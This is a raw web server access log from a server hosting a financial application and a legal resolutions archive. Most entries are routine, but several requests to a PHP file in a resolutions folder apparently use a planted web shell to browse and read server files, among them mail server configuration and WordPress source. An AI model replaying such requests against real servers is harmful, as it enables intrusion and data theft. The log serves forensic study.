191.95.48.121 - - [13/Jun/2024:08:03:09 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 50165
191.95.48.121 - - [13/Jun/2024:08:03:13 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 23166
191.95.48.121 - - [13/Jun/2024:08:03:17 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 115688
191.95.48.121 - - [13/Jun/2024:08:03:17 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:08:03:18 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:08:03:18 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:08:03:18 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:08:03:18 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:08:03:18 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:08:03:18 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.115.64 - - [13/Jun/2024:08:03:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5C&f=xampp_stop.exe&ft=notepad HTTP/1.1" 200 118784
172.22.2.4 - - [13/Jun/2024:08:03:25 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
216.244.66.195 - - [13/Jun/2024:08:03:27 -0500] "GET /BLA/resoluciones/AUTOS%202010/3497.pdf HTTP/1.1" 200 3951277
47.128.98.110 - - [13/Jun/2024:08:03:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cimpresion%5Cimages%5C&f=page4_thumbnail.jpg&ft=download HTTP/1.1" 200 4452
172.22.2.4 - - [13/Jun/2024:08:01:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [13/Jun/2024:08:03:34 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [13/Jun/2024:08:03:34 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [13/Jun/2024:08:03:34 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [13/Jun/2024:08:03:35 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [13/Jun/2024:08:03:36 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
191.95.48.121 - - [13/Jun/2024:08:03:39 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 425847
47.128.60.234 - - [13/Jun/2024:08:03:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Creq%5C&f=index.html&white=1 HTTP/1.1" 200 20
17.241.75.9 - - [13/Jun/2024:08:03:47 -0500] "GET /centro-vive-jornadas-de-educacion-ambiental-para-la-gestion-adecuada-de-residuos.html HTTP/1.1" 200 870
47.128.19.69 - - [13/Jun/2024:08:03:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=class-http.php&ft=notepad&white=1 HTTP/1.1" 200 74947
47.128.124.127 - - [13/Jun/2024:08:04:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=bearlang.it&ft=notepad HTTP/1.1" 200 1159
216.244.66.195 - - [13/Jun/2024:08:04:02 -0500] "GET /BLA/resoluciones/AUTOS%202010/3763.pdf HTTP/1.1" 200 650532
172.22.2.4 - - [13/Jun/2024:08:02:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 44737
47.128.96.96 - - [13/Jun/2024:08:04:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=stdsubw2.mer&ft=notepad HTTP/1.1" 200 2514
3.138.60.166 - - [13/Jun/2024:08:04:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3696.pdf&ft=txt&white=1 HTTP/1.1" 200 3008
172.22.2.4 - - [13/Jun/2024:08:02:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45104
